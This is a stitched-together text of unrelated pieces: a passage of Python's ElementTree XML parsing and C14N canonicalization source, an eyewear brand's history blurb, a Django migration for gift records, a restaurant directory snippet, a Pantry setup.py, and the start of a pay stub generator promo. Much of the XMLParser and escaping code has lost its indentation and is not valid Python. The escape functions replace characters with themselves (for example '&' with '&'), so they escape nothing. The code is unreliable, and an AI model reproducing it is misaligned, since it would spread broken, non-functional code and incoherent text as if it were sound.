    et = ElementTree()
    et.parse(source, parser)
    return et
def iterparse(source, events=None, parser=None):
    """Incrementally parse XML document into ElementTree.
    This class also reports what's going on to the user based on the
    *events* it is initialized with. The supported events are the strings
    "start", "end", "start-ns" and "end-ns" (the "ns" events are used to get
    detailed namespace information). If *events* is omitted, only
    "end" events are reported.
    *source* is a filename or file object containing XML data, *events* is
    a list of events to report back, *parser* is an optional parser instance.
    Returns an iterator providing (event, elem) pairs.
    """
    # Use the internal, undocumented _parser argument for now; When the
    # parser argument of iterparse is removed, this can be killed.
    pullparser = XMLPullParser(events=events, _parser=parser)
    def iterator():
        # NOTE: close_source/source are read lazily -- the generator body
        # does not run until the first next() call, by which point they
        # have been (re)bound below.
        try:
            while True:
                yield from pullparser.read_events()
                # load event buffer
                data = source.read(16 * 1024)
                if not data:
                    break
                pullparser.feed(data)
            root = pullparser._close_and_return_root()
            yield from pullparser.read_events()
            it.root = root
        finally:
            if close_source:
                source.close()
    class IterParseIterator(collections.abc.Iterator):
        __next__ = iterator().__next__
    it = IterParseIterator()
    it.root = None
    del iterator, IterParseIterator
    close_source = False
    if not hasattr(source, "read"):
        # *source* is a path: we opened it, so the iterator must close it.
        source = open(source, "rb")
        close_source = True
    return it
class XMLPullParser:
    """Non-blocking pull parser: feed() data in, read_events() out."""

    def __init__(self, events=None, *, _parser=None):
        # The _parser argument is for internal use only and must not be relied
        # upon in user code. It will be removed in a future release.
        # See http://bugs.python.org/issue17741 for more details.
        self._events_queue = collections.deque()
        self._parser = _parser or XMLParser(target=TreeBuilder())
        # wire up the parser for event reporting
        self._parser._setevents(self._events_queue,
                                ("end",) if events is None else events)

    def feed(self, data):
        """Feed encoded data to parser."""
        if self._parser is None:
            raise ValueError("feed() called after end of stream")
        if not data:
            return
        try:
            self._parser.feed(data)
        except SyntaxError as exc:
            # Surface parse errors through read_events() rather than here.
            self._events_queue.append(exc)

    def _close_and_return_root(self):
        # iterparse needs this to set its root attribute properly :(
        root = self._parser.close()
        self._parser = None
        return root

    def close(self):
        """Finish feeding data to parser.
        Unlike XMLParser, does not return the root element. Use
        read_events() to consume elements from XMLPullParser.
        """
        self._close_and_return_root()

    def read_events(self):
        """Return an iterator over currently available (event, elem) pairs.
        Events are consumed from the internal event queue as they are
        retrieved from the iterator.
        """
        queue = self._events_queue
        while queue:
            item = queue.popleft()
            if isinstance(item, Exception):
                raise item
            yield item
def XML(text, parser=None):
    """Parse XML document from string constant.
    This function can be used to embed "XML Literals" in Python code.
    *text* is a string containing XML data, *parser* is an
    optional parser instance, defaulting to the standard XMLParser.
    Returns an Element instance.
    """
    active = parser or XMLParser(target=TreeBuilder())
    active.feed(text)
    return active.close()
def XMLID(text, parser=None):
    """Parse XML document from string constant for its IDs.
    *text* is a string containing XML data, *parser* is an
    optional parser instance, defaulting to the standard XMLParser.
    Returns an (Element, dict) tuple, in which the
    dict maps element id:s to elements.
    """
    active = parser or XMLParser(target=TreeBuilder())
    active.feed(text)
    root = active.close()
    # Index every element carrying an "id" attribute.
    by_id = {}
    for node in root.iter():
        node_id = node.get("id")
        if node_id:
            by_id[node_id] = node
    return root, by_id

# Parse XML document from string constant. Alias for XML().
fromstring = XML
def fromstringlist(sequence, parser=None):
    """Parse XML document from sequence of string fragments.
    *sequence* is a list of other sequence, *parser* is an optional parser
    instance, defaulting to the standard XMLParser.
    Returns an Element instance.
    """
    active = parser or XMLParser(target=TreeBuilder())
    for fragment in sequence:
        active.feed(fragment)
    return active.close()
# --------------------------------------------------------------------
class TreeBuilder:
    """Generic element structure builder.
    This builder converts a sequence of start, data, and end method
    calls to a well-formed element structure.
    You can use this class to build an element structure using a custom XML
    parser, or a parser for some other XML-like format.
    *element_factory* is an optional element factory which is called
    to create new Element instances, as necessary.
    *comment_factory* is a factory to create comments to be used instead of
    the standard factory. If *insert_comments* is false (the default),
    comments will not be inserted into the tree.
    *pi_factory* is a factory to create processing instructions to be used
    instead of the standard factory. If *insert_pis* is false (the default),
    processing instructions will not be inserted into the tree.
    """
    def __init__(self, element_factory=None, *,
                 comment_factory=None, pi_factory=None,
                 insert_comments=False, insert_pis=False):
        self._data = [] # data collector
        self._elem = [] # element stack
        self._last = None # last element
        self._root = None # root element
        self._tail = None # true if we're after an end tag
        if comment_factory is None:
            comment_factory = Comment
        self._comment_factory = comment_factory
        self.insert_comments = insert_comments
        if pi_factory is None:
            pi_factory = ProcessingInstruction
        self._pi_factory = pi_factory
        self.insert_pis = insert_pis
        if element_factory is None:
            element_factory = Element
        self._factory = element_factory
    def close(self):
        """Flush builder buffers and return toplevel document Element."""
        assert len(self._elem) == 0, "missing end tags"
        assert self._root is not None, "missing toplevel element"
        return self._root
    def _flush(self):
        # Attach buffered character data to the most recent element: as its
        # tail if we are past its end tag, otherwise as its text.
        if self._data:
            if self._last is not None:
                text = "".join(self._data)
                if self._tail:
                    assert self._last.tail is None, "internal error (tail)"
                    self._last.tail = text
                else:
                    assert self._last.text is None, "internal error (text)"
                    self._last.text = text
            self._data = []
    def data(self, data):
        """Add text to current element."""
        self._data.append(data)
    def start(self, tag, attrs):
        """Open new element and return it.
        *tag* is the element name, *attrs* is a dict containing element
        attributes.
        """
        self._flush()
        self._last = elem = self._factory(tag, attrs)
        if self._elem:
            self._elem[-1].append(elem)
        elif self._root is None:
            self._root = elem
        self._elem.append(elem)
        self._tail = 0
        return elem
    def end(self, tag):
        """Close and return current Element.
        *tag* is the element name.
        """
        self._flush()
        self._last = self._elem.pop()
        assert self._last.tag == tag,\
               "end tag mismatch (expected %s, got %s)" % (
                   self._last.tag, tag)
        self._tail = 1
        return self._last
    def comment(self, text):
        """Create a comment using the comment_factory.
        *text* is the text of the comment.
        """
        return self._handle_single(
            self._comment_factory, self.insert_comments, text)
    def pi(self, target, text=None):
        """Create a processing instruction using the pi_factory.
        *target* is the target name of the processing instruction.
        *text* is the data of the processing instruction, or ''.
        """
        return self._handle_single(
            self._pi_factory, self.insert_pis, target, text)
    def _handle_single(self, factory, insert, *args):
        # Shared implementation for comment()/pi(): build the node and, when
        # *insert* is true, splice it into the tree at the current position.
        elem = factory(*args)
        if insert:
            self._flush()
            self._last = elem
            if self._elem:
                self._elem[-1].append(elem)
            self._tail = 1
        return elem
# also see ElementTree and TreeBuilder
class XMLParser:
"""Element structure builder for XML source data based on the expat parser.
*target* is an optional target object which defaults to an instance of the
standard TreeBuilder class, *encoding* is an optional encoding string
which if given, overrides the encoding specified in the XML file:
http://www.iana.org/assignments/character-sets
"""
def __init__(self, *, target=None, encoding=None):
try:
from xml.parsers import expat
except ImportError:
try:
import pyexpat as expat
except ImportError:
raise ImportError(
"No module named expat; use SimpleXMLTreeBuilder instead"
)
parser = expat.ParserCreate(encoding, "}")
if target is None:
target = TreeBuilder()
# underscored names are provided for compatibility only
self.parser = self._parser = parser
self.target = self._target = target
self._error = expat.error
self._names = {} # name memo cache
# main callbacks
parser.DefaultHandlerExpand = self._default
if hasattr(target, 'start'):
parser.StartElementHandler = self._start
if hasattr(target, 'end'):
parser.EndElementHandler = self._end
if hasattr(target, 'start_ns'):
parser.StartNamespaceDeclHandler = self._start_ns
if hasattr(target, 'end_ns'):
parser.EndNamespaceDeclHandler = self._end_ns
if hasattr(target, 'data'):
parser.CharacterDataHandler = target.data
# miscellaneous callbacks
if hasattr(target, 'comment'):
parser.CommentHandler = target.comment
if hasattr(target, 'pi'):
parser.ProcessingInstructionHandler = target.pi
# Configure pyexpat: buffering, new-style attribute handling.
parser.buffer_text = 1
parser.ordered_attributes = 1
parser.specified_attributes = 1
self._doctype = None
self.entity = {}
try:
self.version = "Expat %d.%d.%d" % expat.version_info
except AttributeError:
pass # unknown
def _setevents(self, events_queue, events_to_report):
# Internal API for XMLPullParser
# events_to_report: a list of events to report during parsing (same as
# the *events* of XMLPullParser's constructor.
# events_queue: a list of actual parsing events that will be populated
# by the underlying parser.
#
parser = self._parser
append = events_queue.append
for event_name in events_to_report:
if event_name == "start":
parser.ordered_attributes = 1
parser.specified_attributes = 1
def handler(tag, attrib_in, event=event_name, append=append,
start=self._start):
append((event, start(tag, attrib_in)))
parser.StartElementHandler = handler
elif event_name == "end":
def handler(tag, event=event_name, append=append,
end=self._end):
append((event, end(tag)))
parser.EndElementHandler = handler
elif event_name == "start-ns":
# TreeBuilder does not implement .start_ns()
if hasattr(self.target, "start_ns"):
def handler(prefix, uri, event=event_name, append=append,
start_ns=self._start_ns):
append((event, start_ns(prefix, uri)))
else:
def handler(prefix, uri, event=event_name, append=append):
append((event, (prefix or '', uri or '')))
parser.StartNamespaceDeclHandler = handler
elif event_name == "end-ns":
# TreeBuilder does not implement .end_ns()
if hasattr(self.target, "end_ns"):
def handler(prefix, event=event_name, append=append,
end_ns=self._end_ns):
append((event, end_ns(prefix)))
else:
def handler(prefix, event=event_name, append=append):
append((event, None))
parser.EndNamespaceDeclHandler = handler
elif event_name == 'comment':
def handler(text, event=event_name, append=append, self=self):
append((event, self.target.comment(text)))
parser.CommentHandler = handler
elif event_name == 'pi':
def handler(pi_target, data, event=event_name, append=append,
self=self):
append((event, self.target.pi(pi_target, data)))
parser.ProcessingInstructionHandler = handler
else:
raise ValueError("unknown event %r" % event_name)
def _raiseerror(self, value):
err = ParseError(value)
err.code = value.code
err.position = value.lineno, value.offset
raise err
def _fixname(self, key):
# expand qname, and convert name string to ascii, if possible
try:
name = self._names[key]
except KeyError:
name = key
if "}" in name:
name = "{" + name
self._names[key] = name
return name
def _start_ns(self, prefix, uri):
return self.target.start_ns(prefix or '', uri or '')
def _end_ns(self, prefix):
return self.target.end_ns(prefix or '')
def _start(self, tag, attr_list):
# Handler for expat's StartElementHandler. Since ordered_attributes
# is set, the attributes are reported as a list of alternating
# attribute name,value.
fixname = self._fixname
tag = fixname(tag)
attrib = {}
if attr_list:
for i in range(0, len(attr_list), 2):
attrib[fixname(attr_list[i])] = attr_list[i+1]
return self.target.start(tag, attrib)
def _end(self, tag):
return self.target.end(self._fixname(tag))
    def _default(self, text):
        """Expat default handler: resolves entity references and parses the
        DOCTYPE declaration (expat reports both through this callback)."""
        prefix = text[:1]
        if prefix == "&":
            # deal with undefined entities: look them up in self.entity and
            # forward the replacement text to the target's data handler
            try:
                data_handler = self.target.data
            except AttributeError:
                # target cannot receive character data -- drop the entity
                return
            try:
                data_handler(self.entity[text[1:-1]])
            except KeyError:
                # unknown entity: raise the same error expat itself would
                from xml.parsers import expat
                err = expat.error(
                    "undefined entity %s: line %d, column %d" %
                    (text, self.parser.ErrorLineNumber,
                    self.parser.ErrorColumnNumber)
                    )
                err.code = 11 # XML_ERROR_UNDEFINED_ENTITY
                err.lineno = self.parser.ErrorLineNumber
                err.offset = self.parser.ErrorColumnNumber
                raise err
        elif prefix == "<" and text[:9] == "<!DOCTYPE":
            self._doctype = [] # inside a doctype declaration
        elif self._doctype is not None:
            # parse doctype contents, token by token as expat reports them
            if prefix == ">":
                # end of the doctype declaration
                self._doctype = None
                return
            text = text.strip()
            if not text:
                return
            self._doctype.append(text)
            n = len(self._doctype)
            if n > 2:
                # enough tokens collected to classify the external ID form
                type = self._doctype[1]
                if type == "PUBLIC" and n == 4:
                    name, type, pubid, system = self._doctype
                    if pubid:
                        # strip the surrounding quotes
                        pubid = pubid[1:-1]
                elif type == "SYSTEM" and n == 3:
                    name, type, system = self._doctype
                    pubid = None
                else:
                    # not yet a complete PUBLIC/SYSTEM declaration
                    return
                if hasattr(self.target, "doctype"):
                    # system[1:-1] strips the quotes around the system ID
                    self.target.doctype(name, pubid, system[1:-1])
                elif hasattr(self, "doctype"):
                    warnings.warn(
                        "The doctype() method of XMLParser is ignored. "
                        "Define doctype() method on the TreeBuilder target.",
                        RuntimeWarning)
                self._doctype = None
    def feed(self, data):
        """Feed encoded data to parser."""
        try:
            self.parser.Parse(data, False)
        except self._error as v:
            # Translate the expat error into an ElementTree ParseError.
            self._raiseerror(v)
    def close(self):
        """Finish feeding data to parser and return element structure."""
        try:
            # Signal end-of-input to expat.
            self.parser.Parse(b"", True) # end of data
        except self._error as v:
            self._raiseerror(v)
        try:
            close_handler = self.target.close
        except AttributeError:
            # Target provides no close() hook; nothing to return.
            pass
        else:
            return close_handler()
        finally:
            # get rid of circular references
            del self.parser, self._parser
            del self.target, self._target
# --------------------------------------------------------------------
# C14N 2.0
def canonicalize(xml_data=None, *, out=None, from_file=None, **options):
    """Convert XML to its C14N 2.0 serialised form.

    If *out* is provided, it must be a file or file-like object that receives
    the serialised canonical XML output (text, not bytes) through its
    ``.write()`` method.  To write to a file, open it in text mode with
    encoding "utf-8".  If *out* is not provided, this function returns the
    output as a text string.

    Either *xml_data* (an XML string) or *from_file* (a file path or
    file-like object) must be provided as input.

    The configuration options are the same as for the ``C14NWriterTarget``.
    """
    if xml_data is None and from_file is None:
        raise ValueError("Either 'xml_data' or 'from_file' must be provided as input")
    capture = None
    if out is None:
        # No sink supplied: capture the output and return it as a string.
        capture = out = io.StringIO()
    parser = XMLParser(target=C14NWriterTarget(out.write, **options))
    if xml_data is not None:
        parser.feed(xml_data)
        parser.close()
    else:
        # from_file is guaranteed non-None here by the check above.
        parse(from_file, parser=parser)
    return capture.getvalue() if capture is not None else None
# Matches "prefix:name" QName-shaped text; used to decide whether character
# data in qname-aware tags/attributes needs prefix rewriting.
_looks_like_prefix_name = re.compile(r'^\w+:\w+$', re.UNICODE).match
class C14NWriterTarget:
    """
    Canonicalization writer target for the XMLParser.
    Serialises parse events to XML C14N 2.0.

    The *write* function is used for writing out the resulting data stream
    as text (not bytes).  To write to a file, open it in text mode with
    encoding "utf-8" and pass its ``.write`` method.

    Configuration options:

    - *with_comments*: set to true to include comments
    - *strip_text*: set to true to strip whitespace before and after text content
    - *rewrite_prefixes*: set to true to replace namespace prefixes by "n{number}"
    - *qname_aware_tags*: a set of qname aware tag names in which prefixes
      should be replaced in text content
    - *qname_aware_attrs*: a set of qname aware attribute names in which prefixes
      should be replaced in text content
    - *exclude_attrs*: a set of attribute names that should not be serialised
    - *exclude_tags*: a set of tag names that should not be serialised
    """
    def __init__(self, write, *,
                 with_comments=False, strip_text=False, rewrite_prefixes=False,
                 qname_aware_tags=None, qname_aware_attrs=None,
                 exclude_attrs=None, exclude_tags=None):
        self._write = write
        # Pending character data chunks; joined and written lazily by _flush().
        self._data = []
        self._with_comments = with_comments
        self._strip_text = strip_text
        self._exclude_attrs = set(exclude_attrs) if exclude_attrs else None
        self._exclude_tags = set(exclude_tags) if exclude_tags else None
        self._rewrite_prefixes = rewrite_prefixes
        if qname_aware_tags:
            self._qname_aware_tags = set(qname_aware_tags)
        else:
            self._qname_aware_tags = None
        if qname_aware_attrs:
            # Bound intersection method: called with an attr dict to find
            # which of its keys are qname-aware.
            self._find_qname_aware_attrs = set(qname_aware_attrs).intersection
        else:
            self._find_qname_aware_attrs = None
        # Stack with globally and newly declared namespaces as (uri, prefix) pairs.
        self._declared_ns_stack = [[
            ("http://www.w3.org/XML/1998/namespace", "xml"),
        ]]
        # Stack with user declared namespace prefixes as (uri, prefix) pairs.
        self._ns_stack = []
        if not rewrite_prefixes:
            self._ns_stack.append(list(_namespace_map.items()))
        self._ns_stack.append([])
        self._prefix_map = {}
        # xml:space handling: innermost element's behaviour is last.
        self._preserve_space = [False]
        # Deferred _start() arguments while waiting for qname text content.
        self._pending_start = None
        self._root_seen = False
        self._root_done = False
        # Depth counter while inside an excluded tag (everything is dropped).
        self._ignored_depth = 0

    def _iter_namespaces(self, ns_stack, _reversed=reversed):
        # Yield (uri, prefix) pairs from innermost scope outwards.
        for namespaces in _reversed(ns_stack):
            if namespaces:  # almost no element declares new namespaces
                yield from namespaces

    def _resolve_prefix_name(self, prefixed_name):
        # Map "prefix:name" text content to "{uri}name" using in-scope prefixes.
        prefix, name = prefixed_name.split(':', 1)
        for uri, p in self._iter_namespaces(self._ns_stack):
            if p == prefix:
                return f'{{{uri}}}{name}'
        raise ValueError(f'Prefix {prefix} of QName "{prefixed_name}" is not declared in scope')

    def _qname(self, qname, uri=None):
        """Resolve "{uri}tag" (or tag+uri) to (prefixed_tag, tag, uri),
        declaring a new namespace prefix if required."""
        if uri is None:
            uri, tag = qname[1:].rsplit('}', 1) if qname[:1] == '{' else ('', qname)
        else:
            tag = qname
        prefixes_seen = set()
        for u, prefix in self._iter_namespaces(self._declared_ns_stack):
            if u == uri and prefix not in prefixes_seen:
                return f'{prefix}:{tag}' if prefix else tag, tag, uri
            prefixes_seen.add(prefix)
        # Not declared yet => add new declaration.
        if self._rewrite_prefixes:
            if uri in self._prefix_map:
                prefix = self._prefix_map[uri]
            else:
                prefix = self._prefix_map[uri] = f'n{len(self._prefix_map)}'
            self._declared_ns_stack[-1].append((uri, prefix))
            return f'{prefix}:{tag}', tag, uri
        if not uri and '' not in prefixes_seen:
            # No default namespace declared => no prefix needed.
            return tag, tag, uri
        for u, prefix in self._iter_namespaces(self._ns_stack):
            if u == uri:
                self._declared_ns_stack[-1].append((uri, prefix))
                return f'{prefix}:{tag}' if prefix else tag, tag, uri
        if not uri:
            # As soon as a default namespace is defined,
            # anything that has no namespace (and thus, no prefix) goes there.
            return tag, tag, uri
        raise ValueError(f'Namespace "{uri}" is not declared in scope')

    def data(self, data):
        # Buffer character data; it is flushed on the next structural event.
        if not self._ignored_depth:
            self._data.append(data)

    def _flush(self, _join_text=''.join):
        """Write out buffered character data, completing a deferred start
        tag first if one is pending."""
        data = _join_text(self._data)
        del self._data[:]
        if self._strip_text and not self._preserve_space[-1]:
            data = data.strip()
        if self._pending_start is not None:
            args, self._pending_start = self._pending_start, None
            qname_text = data if data and _looks_like_prefix_name(data) else None
            self._start(*args, qname_text)
            if qname_text is not None:
                # Text was consumed as qname content by _start().
                return
        if data and self._root_seen:
            self._write(_escape_cdata_c14n(data))

    def start_ns(self, prefix, uri):
        if self._ignored_depth:
            return
        # we may have to resolve qnames in text content
        if self._data:
            self._flush()
        self._ns_stack[-1].append((uri, prefix))

    def start(self, tag, attrs):
        """Handle an element start event (possibly deferring serialisation
        until text content is seen, for qname-aware tags)."""
        if self._exclude_tags is not None and (
                self._ignored_depth or tag in self._exclude_tags):
            self._ignored_depth += 1
            return
        if self._data:
            self._flush()
        new_namespaces = []
        self._declared_ns_stack.append(new_namespaces)
        if self._qname_aware_tags is not None and tag in self._qname_aware_tags:
            # Need to parse text first to see if it requires a prefix declaration.
            self._pending_start = (tag, attrs, new_namespaces)
            return
        self._start(tag, attrs, new_namespaces)

    def _start(self, tag, attrs, new_namespaces, qname_text=None):
        """Serialise one start tag with canonically ordered declarations
        and attributes."""
        if self._exclude_attrs is not None and attrs:
            attrs = {k: v for k, v in attrs.items() if k not in self._exclude_attrs}
        qnames = {tag, *attrs}
        resolved_names = {}
        # Resolve prefixes in attribute and tag text.
        if qname_text is not None:
            qname = resolved_names[qname_text] = self._resolve_prefix_name(qname_text)
            qnames.add(qname)
        if self._find_qname_aware_attrs is not None and attrs:
            qattrs = self._find_qname_aware_attrs(attrs)
            if qattrs:
                for attr_name in qattrs:
                    value = attrs[attr_name]
                    if _looks_like_prefix_name(value):
                        qname = resolved_names[value] = self._resolve_prefix_name(value)
                        qnames.add(qname)
            else:
                qattrs = None
        else:
            qattrs = None
        # Assign prefixes in lexicographical order of used URIs.
        parse_qname = self._qname
        parsed_qnames = {n: parse_qname(n) for n in sorted(
            qnames, key=lambda n: n.split('}', 1))}
        # Write namespace declarations in prefix order ...
        if new_namespaces:
            attr_list = [
                ('xmlns:' + prefix if prefix else 'xmlns', uri)
                for uri, prefix in new_namespaces
            ]
            attr_list.sort()
        else:
            # almost always empty
            attr_list = []
        # ... followed by attributes in URI+name order
        if attrs:
            for k, v in sorted(attrs.items()):
                if qattrs is not None and k in qattrs and v in resolved_names:
                    v = parsed_qnames[resolved_names[v]][0]
                attr_qname, attr_name, uri = parsed_qnames[k]
                # No prefix for attributes in default ('') namespace.
                attr_list.append((attr_qname if uri else attr_name, v))
        # Honour xml:space attributes.
        space_behaviour = attrs.get('{http://www.w3.org/XML/1998/namespace}space')
        self._preserve_space.append(
            space_behaviour == 'preserve' if space_behaviour
            else self._preserve_space[-1])
        # Write the tag.
        write = self._write
        write('<' + parsed_qnames[tag][0])
        if attr_list:
            write(''.join([f' {k}="{_escape_attrib_c14n(v)}"' for k, v in attr_list]))
        write('>')
        # Write the resolved qname text content.
        if qname_text is not None:
            write(_escape_cdata_c14n(parsed_qnames[resolved_names[qname_text]][0]))
        self._root_seen = True
        self._ns_stack.append([])

    def end(self, tag):
        if self._ignored_depth:
            self._ignored_depth -= 1
            return
        if self._data:
            self._flush()
        self._write(f'</{self._qname(tag)[0]}>')
        self._preserve_space.pop()
        # Back at document level once only the initial sentinel remains.
        self._root_done = len(self._preserve_space) == 1
        self._declared_ns_stack.pop()
        self._ns_stack.pop()

    def comment(self, text):
        if not self._with_comments:
            return
        if self._ignored_depth:
            return
        if self._root_done:
            # Comments after the root element go on their own line.
            self._write('\n')
        elif self._root_seen and self._data:
            self._flush()
        self._write(f'<!--{_escape_cdata_c14n(text)}-->')
        if not self._root_seen:
            # Comments before the root element go on their own line.
            self._write('\n')

    def pi(self, target, data):
        if self._ignored_depth:
            return
        if self._root_done:
            self._write('\n')
        elif self._root_seen and self._data:
            self._flush()
        self._write(
            f'<?{target} {_escape_cdata_c14n(data)}?>' if data else f'<?{target}?>')
        if not self._root_seen:
            self._write('\n')
def _escape_cdata_c14n(text):
# escape character data
try:
# it's worth avoiding do-nothing calls for strings that are
# shorter than 500 character, or so. assume that's, by far,
# the most common case in most applications.
if '&' in text:
text = text.replace('&', '&')
if '<' in text:
text = text.replace('<', '<')
if '>' in text:
text = text.replace('>', '>')
if '\r' in text:
text = text.replace('\r', '
')
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib_c14n(text):
# escape attribute value
try:
if '&' in text:
text = text.replace('&', '&')
if '<' in text:
text = text.replace('<', '<')
if '"' in text:
text = text.replace('"', '"')
if '\t' in text:
text = text.replace('\t', '	')
if '\n' in text:
text = text.replace('\n', '
')
if '\r' in text:
text = text.replace('\r', '
')
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
# --------------------------------------------------------------------
# Import the C accelerators
try:
    # Element is going to be shadowed by the C implementation. We need to keep
    # the Python version of it accessible for some "creative" use by external
    # code (see tests)
    _Element_Py = Element
    # Element, SubElement, ParseError, TreeBuilder, XMLParser, _set_factories
    from _elementtree import *
    from _elementtree import _set_factories
except ImportError:
    # C extension unavailable: fall back to the pure-Python implementations.
    pass
else:
    # Tell the accelerator which factories to use for comments and PIs.
    _set_factories(Comment, ProcessingInstruction)
|
'A STORY OF A TRAVELLER' is the new artistic brand direction based on the taste of the founder for travelling around the world. Our storytelling follows 5 years of his travel diary from Europe to all continents. First destinations are Canada and Greece (2018/2019) then Japan and India (2019/2020) for our optical and sun collection inspirations.
Thanks to the heritage of Yves Cogan's work, we are creative, imaginative and proud to be French. We have a tailor made approach for producing and assembling together a full range of high quality components. Yves Cogan Brand is the showcase of the French know-how through Made in France process. We pay attention to every single detail. Our values are : Imagination, French Excellence in Design and Craftsmanship.
Mr. Yves Cogan founded his company in 1994 and developed it through his collections Yves Cogan (1997) and Cogan (2004). We have been present in France and worldwide since 1994.
I decided to launch my own brand Yves Cogan.
My garage was renovated into a small office overlooking the garden.
Ten years later, my company moved to a new brand head office in Jura, the heart of the French Eyewear Heritage."
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import audit_log.models.fields
import ananta.models
import model_utils.fields
from django.conf import settings
import django.utils.timezone
class Migration(migrations.Migration):
    """Create the Gift and GiftGiven models.

    Auto-generated Django migration: both models carry created/modified
    timestamps, audit-log session/user tracking, and GiftGiven additionally
    records a delivery status with a change monitor.
    """

    dependencies = [
        ('contacts', '0012_person_note'),
        # Depend on whichever user model the project has configured.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Catalogue entry for a kind of gift.
        migrations.CreateModel(
            name='Gift',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, verbose_name='ID', auto_created=True)),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
                ('created_with_session_key', audit_log.models.fields.CreatingSessionKeyField(null=True, editable=False, max_length=40)),
                ('modified_with_session_key', audit_log.models.fields.LastSessionKeyField(null=True, editable=False, max_length=40)),
                ('name', models.CharField(help_text='Enter gift name.', max_length=100)),
                ('description', models.TextField(blank=True)),
                ('created_by', audit_log.models.fields.CreatingUserField(null=True, to=settings.AUTH_USER_MODEL, related_name='created_gifts_gift_set', editable=False, verbose_name='created by')),
                ('modified_by', audit_log.models.fields.LastUserField(null=True, to=settings.AUTH_USER_MODEL, related_name='modified_gifts_gift_set', editable=False, verbose_name='modified by')),
            ],
            options={
                'abstract': False,
            },
            bases=(ananta.models.NextPrevMixin, models.Model),
        ),
        # A concrete instance of a gift given to a person, with a
        # sent/returned/delivered status and a monitor of status changes.
        migrations.CreateModel(
            name='GiftGiven',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, verbose_name='ID', auto_created=True)),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
                ('created_with_session_key', audit_log.models.fields.CreatingSessionKeyField(null=True, editable=False, max_length=40)),
                ('modified_with_session_key', audit_log.models.fields.LastSessionKeyField(null=True, editable=False, max_length=40)),
                ('status', model_utils.fields.StatusField(choices=[('sent', 'Sent'), ('returned', 'Returned'), ('delivered', 'Delivered')], default='sent', no_check_for_status=True, max_length=100)),
                ('status_changed', model_utils.fields.MonitorField(default=django.utils.timezone.now, monitor='status')),
                ('note', models.TextField(verbose_name='Note', blank=True)),
                ('created_by', audit_log.models.fields.CreatingUserField(null=True, to=settings.AUTH_USER_MODEL, related_name='created_gifts_giftgiven_set', editable=False, verbose_name='created by')),
                ('gift', models.ForeignKey(to='gifts.Gift', related_name='gifts', verbose_name='Gift')),
                ('modified_by', audit_log.models.fields.LastUserField(null=True, to=settings.AUTH_USER_MODEL, related_name='modified_gifts_giftgiven_set', editable=False, verbose_name='modified by')),
                ('person', models.ForeignKey(to='contacts.Person', related_name='gifts', verbose_name='Person')),
            ],
            options={
                'abstract': False,
            },
            bases=(ananta.models.NextPrevMixin, models.Model),
        ),
    ]
|
Restaurants and Dining Guide for Zip Code 63110 - 42 restaurants found in Zip Code 63110. Find a restaurant in Zip Code 63110 by category or zip code. Make reservations, read and write reviews. If you are a business owner, you can contact us to submit your restaurant and get it listed in our restaurants and dining guide.
|
from setuptools import setup, find_packages
from codecs import open
from os import path
# Package metadata and configuration for the Pantry distribution.
here = path.abspath(path.dirname(__file__))
# Use the README as the long description shown on PyPI.
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()
setup(
    name='Pantry',
    # Versions should comply with PEP440. For a discussion on single-sourcing
    # the version across setup.py and the project code, see
    # https://packaging.python.org/en/latest/single_source_version.html
    version='0.3',
    description='A simple file data store',
    long_description=long_description,
    # The project's main homepage.
    url='https://github.com/kryptn/Pantry',
    # Author details
    author='David Bibb',
    author_email='david@dbibb.com',
    # Choose your license
    license='MIT',
    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        # 3 - Alpha
        # 4 - Beta
        # 5 - Production/Stable
        'Development Status :: 3 - Alpha',
        # Indicate who your project is intended for
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Libraries :: Python Modules',
        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: MIT License',
        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],
    # What does your project relate to?
    keywords='simple database datastore data store',
    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
    # List run-time dependencies here. These will be installed by pip when
    # your project is installed. For an analysis of "install_requires" vs pip's
    # requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    #install_requires=['peppercorn'],
    # List additional groups of dependencies here (e.g. development
    # dependencies). You can install these using the following syntax,
    # for example:
    # $ pip install -e .[dev,test]
    #extras_require={
    #    'dev': ['check-manifest'],
    #    'test': ['coverage'],
    #},
    # If there are data files included in your packages that need to be
    # installed, specify them here. If using Python 2.6 or less, then these
    # have to be included in MANIFEST.in as well.
    #package_data={
    #    'sample': ['package_data.dat'],
    #},
    # Although 'package_data' is the preferred approach, in some case you may
    # need to place data files outside of your packages. See:
    # http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
    # In this case, 'data_files' will be installed into '<sys.prefix>/my_data'
    #data_files=[('my_data', ['data/data_file'])],
    # To provide executable scripts, use entry points in preference to the
    # "scripts" keyword. Entry points provide cross-platform support and allow
    # pip to create the appropriate form of executable for the target platform.
    #entry_points={
    #    'console_scripts': [
    #        'sample=sample:main',
    #    ],
    #},
)
|
Internet-based pay stub creators are simple, yet they still do a great job relative to mainstream payroll applications in aspects like working out critical staff and pay information. When you start using the web-based system, you are presented with a form where you can supply employer details such as company name, email address, and state.
